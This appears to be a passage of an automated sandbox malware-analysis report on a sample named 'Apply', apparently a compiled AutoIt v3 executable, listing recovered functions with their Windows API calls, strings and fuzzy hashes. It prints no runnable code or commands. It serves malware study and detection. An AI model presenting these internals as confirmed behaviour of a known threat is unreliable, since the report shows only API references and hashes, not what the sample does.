Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: ac10d718143b958cf530e73323c758e43c848fb3ad6f48bae030a46999a3c61d
Instruction ID: f661502526d0ef89d53a36ce9d1a9b928eb7c1adc542f55ec2d0f65c8fff1816
Opcode Fuzzy Hash: ac10d718143b958cf530e73323c758e43c848fb3ad6f48bae030a46999a3c61d
Instruction Fuzzy Hash: 9A318D71008341AFD304EF54C8C1AAEBBE8FF98350F04092DF981C62A1EB719A49CB93

Function 008BE1AC Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00893902), ref: 008BE1BC
FindFirstFileW.KERNEL32(?,?), ref: 008BE1CD
FindClose.KERNEL32(00000000), ref: 008BE1DD

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: c832c2167a034637bd4dcfdcfffdf3edc406596fd9b99b8e0f30f2c265cdca50
Instruction ID: d6698e4fab7f107e715e869e0d6ef31745a18d2f95f0d645f892418ec7aee48d
Opcode Fuzzy Hash: c832c2167a034637bd4dcfdcfffdf3edc406596fd9b99b8e0f30f2c265cdca50
Instruction Fuzzy Hash: EAE048358146145F5210673CEC4D8EA775CFA06336F200715F975C52E0E774ED4445A5

Function 008535D5 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

", xrefs: 00893833
#OnAutoItStartRegister, xrefs: 00853674
#comments-start, xrefs: 008536BC, 0085370E
', xrefs: 00893849
#ce, xrefs: 0085374A
Unterminated group of comments, xrefs: 0089396C
#include-once, xrefs: 0085368C
#notrayicon, xrefs: 00853644
#requireadmin, xrefs: 0085365C
#cs, xrefs: 008536D0, 00853722
#comments-end, xrefs: 00853736
#pragma compile, xrefs: 00853630
Cannot parse #include, xrefs: 00893959
#include, xrefs: 008536A4
Bad directive syntax error, xrefs: 0089387A

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 47489a37e58972dd7fa698c8ec0de276548daea069e7494db1eae6d125c8b0f5
Instruction ID: 7025534dd3270e9b52a5ddf097c56d2c3046607879dd870c218fb39ccfcc8498
Opcode Fuzzy Hash: 47489a37e58972dd7fa698c8ec0de276548daea069e7494db1eae6d125c8b0f5
Instruction Fuzzy Hash: 5781E771A40209BBCF10EB64DC42FAA3BA4FF15385F044024FD05EA295EB74DB59D7A2

Function 0085DCC0 Relevance: 21.6, APIs: 14, Instructions: 640sleepsynchronizationtimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0085DDA7
timeGetTime.WINMM ref: 0085DFA7
Sleep.KERNEL32(0000000A), ref: 0085E151
Sleep.KERNEL32(0000000A), ref: 008A310C
GetExitCodeProcess.KERNEL32(?,?), ref: 008A31A7
WaitForSingleObject.KERNEL32(?,00000000), ref: 008A31BF
CloseHandle.KERNEL32(?), ref: 008A31D3
Sleep.KERNEL32(?,CCCCCCCC,00000000), ref: 008A323F

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Sleep$CloseCodeExitHandleInputObjectProcessSingleStateTimeWaittime
String ID:
API String ID: 388478766-0
Opcode ID: 0c80acabba7a6e2d233527698494ceb7150767d01f7d2e4e227c0bc7ba3278dc
Instruction ID: cf8ad52fddecdabe84f541bbff7aa325a101bf02ffcb2ec217de855c666e0fd6
Opcode Fuzzy Hash: 0c80acabba7a6e2d233527698494ceb7150767d01f7d2e4e227c0bc7ba3278dc
Instruction Fuzzy Hash: D842BF70608745EFE738CB28C844B6AB7A5FF42306F14451DF85AC7691DB74E988CB92

Function 008529BC Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 008529EF
RegisterClassExW.USER32(00000030), ref: 00852A19
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00852A2A
InitCommonControlsEx.COMCTL32(?), ref: 00852A47
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00852A57
LoadIconW.USER32(000000A9), ref: 00852A6D
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00852A7C

Strings

TaskbarCreated, xrefs: 00852A1F
+, xrefs: 008529D8
0, xrefs: 008529D1
AutoIt v3 GUI, xrefs: 00852A0B

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 86e03d1252589c46dd8a1c9cb976d54044b4e8293a7889d6425dba650cc38528
Instruction ID: 074fadc31ea3a478748b402f95781ccbf19b73a55b7e10ceb016ef3fcb5d833b
Opcode Fuzzy Hash: 86e03d1252589c46dd8a1c9cb976d54044b4e8293a7889d6425dba650cc38528
Instruction Fuzzy Hash: BF2122B5915358AFDB10DFA4ED88B9DBBF4FB08710F00411AFA10AA2A0D7B54189DF90

Function 008909AE Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008906ED: CreateFileW.KERNEL32(00000000,00000000,?,00890A57,?,?,00000000,?,00890A57,00000000,0000000C), ref: 0089070A

GetLastError.KERNEL32 ref: 00890AC2
__dosmaperr.LIBCMT ref: 00890AC9
GetFileType.KERNEL32(00000000), ref: 00890AD5
GetLastError.KERNEL32 ref: 00890ADF
__dosmaperr.LIBCMT ref: 00890AE8
CloseHandle.KERNEL32(00000000), ref: 00890B08
CloseHandle.KERNEL32(?), ref: 00890C52
GetLastError.KERNEL32 ref: 00890C84
__dosmaperr.LIBCMT ref: 00890C8B

Strings

H, xrefs: 00890C10

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: e7bf731e65c87b52dff218c3021129b4e7e9c20cd1fc94c838a4f2b2fcb3d49c
Instruction ID: 3b500feab6acfc13c1bae9ac995e7e83ba01edbeca97a5a466a986f0349e575d
Opcode Fuzzy Hash: e7bf731e65c87b52dff218c3021129b4e7e9c20cd1fc94c838a4f2b2fcb3d49c
Instruction Fuzzy Hash: C8A10132A142588FDF19AF6CD8927AE7BA0FB06324F180159F811EB3D1DB319D12CB52

Function 00853AE4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00853DD1: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00892A98,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00853DEF

Part of subcall function 00853A75: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00853A97

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00853C01
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008939E6
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00893A27
RegCloseKey.ADVAPI32(?), ref: 00893A69
_wcslen.LIBCMT ref: 00893AD0
_wcslen.LIBCMT ref: 00893ADF

Strings

\, xrefs: 00893AE5
Software\AutoIt v3\AutoIt, xrefs: 00853BF7
Include, xrefs: 008939DD, 00893A1E
\Include\, xrefs: 00853BBE

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: c4be048c6927693107737e88f10b82d25757ce94c7e985625800163d54bef39a
Instruction ID: 0aed9f82599a8d9d436af02d1cb32ab19f3525edf6ac5ba53fad79ab6503bc76
Opcode Fuzzy Hash: c4be048c6927693107737e88f10b82d25757ce94c7e985625800163d54bef39a
Instruction Fuzzy Hash: C67181715183019EC714EF69EC8189BBBE8FF95350F80892EF845C71A0EB749B49DB52

Function 0085286B Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00852876
LoadCursorW.USER32(00000000,00007F00), ref: 00852885
LoadIconW.USER32(00000063), ref: 0085289B
LoadIconW.USER32(000000A4), ref: 008528AD
LoadIconW.USER32(000000A2), ref: 008528BF
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008528D7
RegisterClassExW.USER32(?), ref: 00852928

Part of subcall function 008529BC: GetSysColorBrush.USER32(0000000F), ref: 008529EF
Part of subcall function 008529BC: RegisterClassExW.USER32(00000030), ref: 00852A19
Part of subcall function 008529BC: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00852A2A
Part of subcall function 008529BC: InitCommonControlsEx.COMCTL32(?), ref: 00852A47
Part of subcall function 008529BC: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00852A57
Part of subcall function 008529BC: LoadIconW.USER32(000000A9), ref: 00852A6D
Part of subcall function 008529BC: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00852A7C

Strings

AutoIt v3, xrefs: 00852917
#, xrefs: 008528FE
0, xrefs: 008528F7

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 34e08914b9ae0a662e67e0c86136ba6d5b629f045cf4d8ec3308942e95d07106
Instruction ID: 68c0d75def0c95527871b77f4093f620b8eef3446cf85d523e7747bff04f3bab
Opcode Fuzzy Hash: 34e08914b9ae0a662e67e0c86136ba6d5b629f045cf4d8ec3308942e95d07106
Instruction Fuzzy Hash: 0B21EA71D24354BFDB20EFA5EC45A997FB4FB48F50F00402AE604A62A0D7B95549EF90

Function 008D43B7 Relevance: 16.8, APIs: 11, Instructions: 344
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 008D43E3
CoInitialize.OLE32(00000000), ref: 008D4411
CoUninitialize.OLE32 ref: 008D441B
_wcslen.LIBCMT ref: 008D44B4
GetRunningObjectTable.OLE32(00000000,?), ref: 008D4538
SetErrorMode.KERNEL32(00000001,00000029), ref: 008D465C
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 008D4695
CoGetObject.OLE32(?,00000000,008F0B80,?), ref: 008D46B4
SetErrorMode.KERNEL32(00000000), ref: 008D46C7
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 008D474B
VariantClear.OLEAUT32(?), ref: 008D475F

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: f9185015315073b019cc4f76b6994e8e00ca5517bbc3f7c59220ce65b896cf08
Instruction ID: 87a09e699119f9c70eabe1b583cbce98006bc50547d84abe36f1c94cad123d47
Opcode Fuzzy Hash: f9185015315073b019cc4f76b6994e8e00ca5517bbc3f7c59220ce65b896cf08
Instruction Fuzzy Hash: 98C13271608305AF9700DF68D88492BB7E9FF89748F145A1EF98ACB250DB30ED45CB52

Function 0085326C Relevance: 16.3, APIs: 3, Strings: 6, Instructions: 530
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00856903: FindCloseChangeNotification.KERNEL32(?,?,?,008532C7), ref: 00856923

Part of subcall function 00855E02: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,008532FC,?,00008000), ref: 00855E30

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008533E0
_wcslen.LIBCMT ref: 0085345F
SetCurrentDirectoryW.KERNEL32(?), ref: 0085353D

Strings

#include depth exceeded. Make sure there are no recursive includes, xrefs: 008933B8
AU3!, xrefs: 00853391
EA06, xrefs: 00893430
Unterminated string, xrefs: 008937D0
Bad directive syntax error, xrefs: 0089375E
Error opening the file, xrefs: 00893785, 008937EC

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CurrentDirectory$ChangeCloseCreateFileFindNotification_wcslen
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2701412040-3738523708
Opcode ID: 982aee14cc85a3e0db5c16514a809a41fbc2ac7bd1d71604f1189e802c6e439f
Instruction ID: 98b3b8bb25c85b6c0fc8440f12b32a2a7015a179a2287e9040b4ecf92dce9e97
Opcode Fuzzy Hash: 982aee14cc85a3e0db5c16514a809a41fbc2ac7bd1d71604f1189e802c6e439f
Instruction Fuzzy Hash: AD1289705083459BCB15EF28C881AAEBBE4FF95355F44491EF88AD32A1DB30DA49CB53

Function 008D0CE2 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 008D0D43
inet_addr.WSOCK32(?), ref: 008D0DA3
gethostbyname.WS2_32(?), ref: 008D0DAF
IcmpCreateFile.IPHLPAPI ref: 008D0DBD
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 008D0E4D
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 008D0E6C
IcmpCloseHandle.IPHLPAPI(?), ref: 008D0F40
WSACleanup.WSOCK32 ref: 008D0F46

Strings

Ping, xrefs: 008D0DFD

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 3cacb4db8d728183659d870f0150ba1c7a3ae457904981b05ba63b653059d26b
Instruction ID: bafb8f7f7121c9bb670dea717f844a3bdebbc618c6c8a23976a31ddad262b516
Opcode Fuzzy Hash: 3cacb4db8d728183659d870f0150ba1c7a3ae457904981b05ba63b653059d26b
Instruction Fuzzy Hash: B0914A716082419FD720DF19C489B16BBE1FF44358F148AAAE469CB7A2CB30ED45CF92

Function 00852F92 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00852F8C,?,?), ref: 00852FFA
KillTimer.USER32(?,00000001,?,?,?,?,?,00852F8C,?,?), ref: 00853026
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00853049
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00852F8C,?,?), ref: 00853054
CreatePopupMenu.USER32 ref: 00853068
PostQuitMessage.USER32(00000000), ref: 00853089

Strings

TaskbarCreated, xrefs: 0085304F

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: c670b56311836863c61585cd1f8c1a7119e625162d1f5a0be32b54c2e705d2e9
Instruction ID: d9370457407a799fc5e2f6e49e42f0fc92efc9ae8f6b95661cbea91dc0c03438
Opcode Fuzzy Hash: c670b56311836863c61585cd1f8c1a7119e625162d1f5a0be32b54c2e705d2e9
Instruction Fuzzy Hash: 7C412530218798BBDF38AB38AC49B793A64F74538AF040125FD02CA1E1DF758A4DA312

Function 00889095 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf15fa3dca3951b162da0c344f818af41284ee94d5d0b6e024966ca62660fdbd
Instruction ID: 69e15fda347f3300f9ab48a3639a1dac630fced3158baa6b44d7e7e55bbcd898
Opcode Fuzzy Hash: bf15fa3dca3951b162da0c344f818af41284ee94d5d0b6e024966ca62660fdbd
Instruction Fuzzy Hash: 02C1AE74A04249AFDB11EFACC885BBDBBB4FF19310F184199E494EB392C7349942CB61

Function 0086AAF7 Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d1r0,2, xrefs: 0086AB62
d0b, xrefs: 0086AB4F, 0086ABC9, 0086AD60
d5m0, xrefs: 0086AD2E
i, xrefs: 0086AF5C
d10m0, xrefs: 0086ABA9
d1b, xrefs: 0086AC0E, 0086AD47

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID:
String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
API String ID: 0-4285391669
Opcode ID: 1b6c9e3d0141e99f198305f18caf7cbf311de5d96ab237be34f32786fe66f1bd
Instruction ID: ae5bcc4da46802567441c07eab02dd1a8a626241571f6852d0150cfb700df3c4
Opcode Fuzzy Hash: 1b6c9e3d0141e99f198305f18caf7cbf311de5d96ab237be34f32786fe66f1bd
Instruction Fuzzy Hash: F4622774508381DFD728DF15C084AAABBE0FF89308F14896EE999CB351DB719949CF92

Function 0085294B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00852979
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0085299A
ShowWindow.USER32(00000000,?,?,?,?,?,?,00851727,?), ref: 008529AE
ShowWindow.USER32(00000000,?,?,?,?,?,?,00851727,?), ref: 008529B7

Strings

AutoIt v3, xrefs: 00852971, 00852976, 00852977
edit, xrefs: 00852994

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: b09d56d94e7cb6eaa42741f4922a3211aa5efb22587111613644cd33ba96e580
Instruction ID: b5806c4620e3b6a6a90bd476bebd3fc9c247ff50945be810999e51cfd9f31b3b
Opcode Fuzzy Hash: b09d56d94e7cb6eaa42741f4922a3211aa5efb22587111613644cd33ba96e580
Instruction Fuzzy Hash: 61F0FE715543D0BAEB3197276C48E373EBDE7CBF50F00001EB904A6170D5691856EAB0

Function 008D10B7 Relevance: 7.6, APIs: 5, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsWindow.USER32(00000000), ref: 008D10D8
GetForegroundWindow.USER32 ref: 008D10EF
GetDC.USER32(00000000), ref: 008D112B
GetPixel.GDI32(00000000,?,00000003), ref: 008D1137
ReleaseDC.USER32(00000000,00000003), ref: 008D116F

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
